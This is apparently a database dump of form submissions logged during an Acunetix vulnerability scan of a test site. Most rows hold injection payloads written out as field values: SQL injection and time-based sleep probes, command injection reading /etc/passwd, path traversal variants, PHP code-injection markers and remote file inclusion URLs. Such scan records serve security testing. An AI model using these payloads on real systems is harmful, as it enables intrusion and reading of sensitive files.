686 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 testasp.vulnweb.com
687 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
688 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 h 1 1 1 1 1
689 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1
690 2017-12-08 13:46:26Z 1 "|"ld 1 4111111111111111 1 1 1 1 1 1 1 1 1
691 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 !(()&&!|*|*| 1 1
692 2017-12-08 13:46:26Z 1 1 1 ${@print(md5(acunetix_wvs_security_test))} 1 1 1 1 1 1 1 1 1
693 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 -1 or 61=61 1 1 1 1 1 1
694 2017-12-08 13:46:26Z http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
695 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ../../../../../../../../../../etc/passwd.jpg 1
696 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 ^(#$!@#$)(()))****** 1 1
697 2017-12-08 13:46:26Z 1 ;cat /etc/passwd; 1 4111111111111111 1 1 1 1 1 1 1 1 1
698 2017-12-08 13:46:26Z 1 1 1 ${@print(md5(acunetix_wvs_security_test))}\ 1 1 1 1 1 1 1 1 1
699 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 .. 1 1 1 1 1
700 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 1
701 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 -1 or 61=0 1 1 1 1 1 1
702 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 ) 1 1 1 1 1
703 2017-12-08 13:46:26Z 1some_inexistent_file_with_long_name%00.jpg 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
704 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1
705 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 -1 or 61-59=2 1 1 1 1 1 1
706 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1e309 1 1 1 1 1
707 2017-12-08 13:46:26Z 1 1 1 4111111111111111 ;print(md5(acunetix_wvs_security_test)); 1 1 1 1 1 1 1 1
708 2017-12-08 13:46:26Z 1 ';cat /etc/passwd;' 1 4111111111111111 1 1 1 1 1 1 1 1 1
709 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 !(()&&!|*|*| 1 1 1 1 1
710 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 '"\'\");|]*{
711 1 1 1 1 1
712 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 -1' or '11'='11 1 1 1 1 1 1
713 2017-12-08 13:46:26Z http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
714 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 /../..//../..//../..//../..//../..//etc/passwd.jpg 1
715 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 Array 1 1 1 1 1
716 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 ^(#$!@#$)(()))****** 1 1 1 1 1
717 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 -1' or '11'='0 1 1 1 1 1 1
718 2017-12-08 13:46:27Z 1 ";cat /etc/passwd;" 1 4111111111111111 1 1 1 1 1 1 1 1 1
719 2017-12-08 13:46:27Z 1 1 1 4111111111111111 ';print(md5(acunetix_wvs_security_test));$a=' 1 1 1 1 1 1 1 1
720 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 )
721 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
722 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 1
723 2017-12-08 13:46:27Z testasp.vulnweb.com 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
724 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
725 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 -1' or '9'='9 1 1 1 1 1 1
726 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 /etc/passwd 1
727 2017-12-08 13:46:27Z 1 ||cat /etc/passwd 1 4111111111111111 1 1 1 1 1 1 1 1 1
728 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 !(()&&!|*|*|
729 2017-12-08 13:46:27Z 1 1 1 4111111111111111 ";print(md5(acunetix_wvs_security_test));$a=" 1 1 1 1 1 1 1 1
730 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 268435455
731 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 -1" or "95"="95 1 1 1 1 1 1
732 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 1
733 2017-12-08 13:46:27Z 1 1 &cat /etc/passwd& 4111111111111111 1 1 1 1 1 1 1 1 1
734 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 h
735 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ^(#$!@#$)(()))******
736 2017-12-08 13:46:27Z 1 1 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg 1 1 1 1 1 1 1 1 1
737 2017-12-08 13:46:27Z 1 1 1 4111111111111111 ${@print(md5(acunetix_wvs_security_test))} 1 1 1 1 1 1 1 1
738 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ..
739 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 -1" or "95"="0 1 1 1 1 1 1
740 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 1
741 2017-12-08 13:46:27Z 1 1 '&cat /etc/passwd&' 4111111111111111 1 1 1 1 1 1 1 1 1
742 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 -1" or "93"="93 1 1 1 1 1 1
743 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1e309
744 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ................etc/passwd 1
745 2017-12-08 13:46:27Z 1 1 1 4111111111111111 http://testasp.vulnweb.com/t/xss.html?%00.jpg 1 1 1 1 1 1 1 1
746 2017-12-08 13:46:27Z ) 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
747 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 '"\'\");|]*{
748
749 2017-12-08 13:46:27Z 1 1 1 4111111111111111 ${@print(md5(acunetix_wvs_security_test))}\ 1 1 1 1 1 1 1 1
750 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 1
751 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 Array
752 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg 1 1 1 1
753 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 and sleep(4) 1 1 1 1 1 1
754 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 ;print(md5(acunetix_wvs_security_test)); 1 1 1 1
755 2017-12-08 13:46:27Z 1 1 "&cat /etc/passwd&" 4111111111111111 1 1 1 1 1 1 1 1 1
756 2017-12-08 13:46:27Z !(()&&!|*|*| 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
757 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
758 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 file:///etc/passwd 1
759 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg 1 1 1 1 1 1
760 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 or (sleep(4)+1) limit 1 -- 1 1 1 1 1 1
761 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 ';print(md5(acunetix_wvs_security_test));$a=' 1 1 1 1
762 2017-12-08 13:46:27Z 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
763 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 /\../\../\../\../\../\../\../etc/passwd 1
764 2017-12-08 13:46:27Z 1 1
765
766 4111111111111111 1 1 1 1 1 1 1 1 1
767 2017-12-08 13:46:27Z ^(#$!@#$)(()))****** 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
768 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 ";print(md5(acunetix_wvs_security_test));$a=" 1 1 1 1
769 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg 1 1 1
770 2017-12-08 13:46:27Z 268435455 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
771 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1' and sleep(4)=' 1 1 1 1 1 1
772 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
773 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 ${@print(md5(acunetix_wvs_security_test))} 1 1 1 1
774 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 WEB-INF/web.xml 1
775 2017-12-08 13:46:27Z 1 1 `cat /etc/passwd` 4111111111111111 1 1 1 1 1 1 1 1 1
776 2017-12-08 13:46:27Z h 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
777 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg 1
778 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1' and (sleep(4)+1) limit 1 -- 1 1 1 1 1 1
779 2017-12-08 13:46:27Z .. 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
780 2017-12-08 13:46:27Z 1 1 |cat /etc/passwd# 4111111111111111 1 1 1 1 1 1 1 1 1
781 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 WEB-INF\web.xml 1
782 2017-12-08 13:46:27Z 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg 1 4111111111111111 1 1 1 1 1 1 1 1 1
783 2017-12-08 13:46:27Z 1 1 1 acunetix_wvs_invalid_filename 1 1 1 1 1 1 1 1 1
784 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1 1 ${@print(md5(acunetix_wvs_security_test))}\ 1 1 1 1
785 2017-12-08 13:46:27Z 1 1 '|'ld 4111111111111111 1 1 1 1 1 1 1 1 1
786 2017-12-08 13:46:27Z 1 ../../../../../../../../../../etc/passwd 1 4111111111111111 1 1 1 1 1 1 1 1 1
787 2017-12-08 13:46:27Z 1e309 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
788 2017-12-08 13:46:27Z 1 1 1 4111111111111111 1 1 1" and sleep(4)=" 1 1 1 1 1 1
789 2017-12-08 13:46:27Z 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 4111111111111111 1 1 1 1 1 1 1 1 1
790 2017-12-08 13:46:27Z 1 1 "|"ld 4111111111111111 1 1 1 1 1 1 1 1 1
791 2017-12-08 13:46:28Z 1 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg 4111111111111111 1 1 1 1 1 1 1 1 1
792 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 ;print(md5(acunetix_wvs_security_test)); 1 1 1 1 1 1
793 2017-12-08 13:46:28Z 1 1 1 bbg_recv_test.php 1 1 1 1 1 1 1 1 1
794 2017-12-08 13:46:28Z 1 ../../../../../../../../../../etc/passwd.jpg 1 4111111111111111 1 1 1 1 1 1 1 1 1
795 2017-12-08 13:46:28Z 1 1 ;cat /etc/passwd; 4111111111111111 1 1 1 1 1 1 1 1 1
796 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg 1 1 1 1 1 1 1
797 2017-12-08 13:46:28Z '"\'\");|]*{
798 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
799 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1' or (sleep(4)+1) limit 1 -- 1 1 1 1 1 1
800 2017-12-08 13:46:28Z 1 1 ';cat /etc/passwd;' 4111111111111111 1 1 1 1 1 1 1 1 1
801 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 1 1 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg 1 1
802 2017-12-08 13:46:28Z 1 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 1 4111111111111111 1 1 1 1 1 1 1 1 1
803 2017-12-08 13:46:28Z 1 1 1 bbg_recv_test.php 1 1 1 1 1 1 1 1 1
804 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 ';print(md5(acunetix_wvs_security_test));$a=' 1 1 1 1 1 1
805 2017-12-08 13:46:28Z 1 1 ";cat /etc/passwd;" 4111111111111111 1 1 1 1 1 1 1 1 1
806 2017-12-08 13:46:28Z Array 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
807 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg 1 1 1 1 1
808 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1" or (sleep(4)+1) limit 1 -- 1 1 1 1 1 1
809 2017-12-08 13:46:28Z 1 1 ||cat /etc/passwd 4111111111111111 1 1 1 1 1 1 1 1 1
810 2017-12-08 13:46:28Z 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 4111111111111111 1 1 1 1 1 1 1 1 1
811 2017-12-08 13:46:28Z 1 1 1 http://testasp.vulnweb.com/t/fit.txt 1 1 1 1 1 1 1 1 1
812 2017-12-08 13:46:28Z 1 1 1 bbg_recv_test.php/. 1 1 1 1 1 1 1 1 1
813 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 &cat /etc/passwd& 1 1 1 1 1 1 1
814 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 ";print(md5(acunetix_wvs_security_test));$a=" 1 1 1 1 1 1
815 2017-12-08 13:46:28Z 1 /../..//../..//../..//../..//../..//etc/passwd.jpg 1 4111111111111111 1 1 1 1 1 1 1 1 1
816 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 http://testasp.vulnweb.com/t/xss.html?%00.jpg
817 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1'=sleep(4)=' 1 1 1 1 1 1
818 2017-12-08 13:46:28Z 1 1 1 4111111111111111 http://testasp.vulnweb.com/t/fit.txt 1 1 1 1 1 1 1 1
819 2017-12-08 13:46:28Z http://testasp.vulnweb.com/t/xss.html?%00.jpg 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
820 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 '&cat /etc/passwd&' 1 1 1 1 1 1 1
821 2017-12-08 13:46:28Z 1 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 1 4111111111111111 1 1 1 1 1 1 1 1 1
822 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
823 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 ${@print(md5(acunetix_wvs_security_test))} 1 1 1 1 1 1
824 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1"=sleep(4)=" 1 1 1 1 1 1
825 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 "&cat /etc/passwd&" 1 1 1 1 1 1 1
826 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 1 http://testasp.vulnweb.com/t/fit.txt 1 1 1 1
827 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
828 2017-12-08 13:46:28Z 1 /etc/passwd 1 4111111111111111 1 1 1 1 1 1 1 1 1
829 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1;select pg_sleep(4); -- 1 1 1 1 1 1
830 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 http://testasp.vulnweb.com/t/fit.txt 1 1 1 1 1 1
831 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1
832
833 1 1 1 1 1 1 1
834 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 ${@print(md5(acunetix_wvs_security_test))}\ 1 1 1 1 1 1
835 2017-12-08 13:46:28Z 1 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 1 4111111111111111 1 1 1 1 1 1 1 1 1
836 2017-12-08 13:46:28Z 1 1 1 4111111111111111 acunetix_wvs_invalid_filename 1 1 1 1 1 1 1 1
837 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1';select pg_sleep(4); -- 1 1 1 1 1 1
838 2017-12-08 13:46:28Z 1 1 1 1'" 1 1 1 1 1 1 1 1 1
839 2017-12-08 13:46:28Z 1 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 1 4111111111111111 1 1 1 1 1 1 1 1 1
840 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 1 1 http://testasp.vulnweb.com/t/fit.txt 1 1 1
841 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 `cat /etc/passwd` 1 1 1 1 1 1 1
842 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 1 1 ;print(md5(acunetix_wvs_security_test)); 1 1 1
843 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1; waitfor delay '0:0:4' -- 1 1 1 1 1 1
844 2017-12-08 13:46:28Z 1 1 1 4111111111111111 bbg_recv_test.php 1 1 1 1 1 1 1 1
845 2017-12-08 13:46:28Z 1 ................etc/passwd 1 4111111111111111 1 1 1 1 1 1 1 1 1
846 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 |cat /etc/passwd# 1 1 1 1 1 1 1
847 2017-12-08 13:46:28Z 1 1 1 \ 1 1 1 1 1 1 1 1 1
848 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 http://testasp.vulnweb.com/t/fit.txt 1
849 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 '|'ld 1 1 1 1 1 1 1
850 2017-12-08 13:46:28Z 1 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 1 4111111111111111 1 1 1 1 1 1 1 1 1
851 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1'; waitfor delay '0:0:4' -- 1 1 1 1 1 1
852 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 1 1 ';print(md5(acunetix_wvs_security_test));$a=' 1 1 1
853 2017-12-08 13:46:28Z 1 1 1 4111111111111111 bbg_recv_test.php 1 1 1 1 1 1 1 1
854 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 "|"ld 1 1 1 1 1 1 1
855 2017-12-08 13:46:28Z 1 1 1 1xa7 1 1 1 1 1 1 1 1 1
856 2017-12-08 13:46:28Z 1 http://testasp.vulnweb.com/t/fit.txt 1 4111111111111111 1 1 1 1 1 1 1 1 1
857 2017-12-08 13:46:28Z 1 1 1 4111111111111111 bbg_recv_test.php/. 1 1 1 1 1 1 1 1
858 2017-12-08 13:46:28Z 1 file:///etc/passwd 1 4111111111111111 1 1 1 1 1 1 1 1 1
859 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1 1 1 ";print(md5(acunetix_wvs_security_test));$a=" 1 1 1
860 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 1 1"; waitfor delay '0:0:4' -- 1 1 1 1 1 1
861 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 ;cat /etc/passwd; 1 1 1 1 1 1 1
862 2017-12-08 13:46:28Z 1 1 1 @@HY5Sp 1 1 1 1 1 1 1 1 1
863 2017-12-08 13:46:28Z 1 1 http://testasp.vulnweb.com/t/fit.txt 4111111111111111 1 1 1 1 1 1 1 1 1
864 2017-12-08 13:46:28Z 1 1 1 4111111111111111 1 ';cat /etc/passwd;' 1 1 1 1 1 1 1
865 2017-12-08 13:46:29Z 1 /\../\../\../\../\../\../\../etc/passwd 1 4111111111111111 1 1 1 1 1 1 1 1 1
866 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
867 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
868 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 ${@print(md5(acunetix_wvs_security_test))} 1 1 1
869 2017-12-08 13:46:29Z 1 1 1 JyI= 1 1 1 1 1 1 1 1 1
870 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 http://testasp.vulnweb.com/t/fit.txt 1 1 1 1 1 1 1
871 2017-12-08 13:46:29Z 1 WEB-INF/web.xml 1 4111111111111111 1 1 1 1 1 1 1 1 1
872 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
873 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 ";cat /etc/passwd;" 1 1 1 1 1 1 1
874 2017-12-08 13:46:29Z 1 WEB-INF\web.xml 1 4111111111111111 1 1 1 1 1 1 1 1 1
875 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 ${@print(md5(acunetix_wvs_security_test))}\ 1 1 1
876 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 acunetix_wvs_invalid_filename 1 1 1 1
877 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 -1 or 44=44 1 1 1
878 2017-12-08 13:46:29Z 1 1 ../../../../../../../../../../etc/passwd 4111111111111111 1 1 1 1 1 1 1 1 1
879 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 ||cat /etc/passwd 1 1 1 1 1 1 1
880 2017-12-08 13:46:29Z 1 1 1 '" 1 1 1 1 1 1 1 1 1
881 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 -1 or 44=0 1 1 1
882 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ;print(md5(acunetix_wvs_security_test)); 1
883 2017-12-08 13:46:29Z 1 1 1 ''"" 1 1 1 1 1 1 1 1 1
884 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 bbg_recv_test.php 1 1 1 1
885 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 http://testasp.vulnweb.com/t/fit.txt 1 1
886 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 &cat /etc/passwd& 1 1
887 2017-12-08 13:46:29Z 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 4111111111111111 1 1 1 1 1 1 1 1 1
888 2017-12-08 13:46:29Z 1 1 ../../../../../../../../../../etc/passwd.jpg 4111111111111111 1 1 1 1 1 1 1 1 1
889 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 '&cat /etc/passwd&' 1 1
890 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
891 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 -1 or 44-42=2 1 1 1
892 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 bbg_recv_test.php 1 1 1 1
893 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ';print(md5(acunetix_wvs_security_test));$a=' 1
894 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 http://testasp.vulnweb.com/t/fit.txt 1 1 1 1 1
895 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1'" 1 1 1 1 1 1 1 1
896 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 -1' or '60'='60 1 1 1
897 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 bbg_recv_test.php/. 1 1 1 1
898 2017-12-08 13:46:29Z 1 1 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 4111111111111111 1 1 1 1 1 1 1 1 1
899 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ";print(md5(acunetix_wvs_security_test));$a=" 1
900 2017-12-08 13:46:29Z 1 1 1 4111111111111111 1 1 1 1 1 1 "&cat /etc/passwd&" 1 1
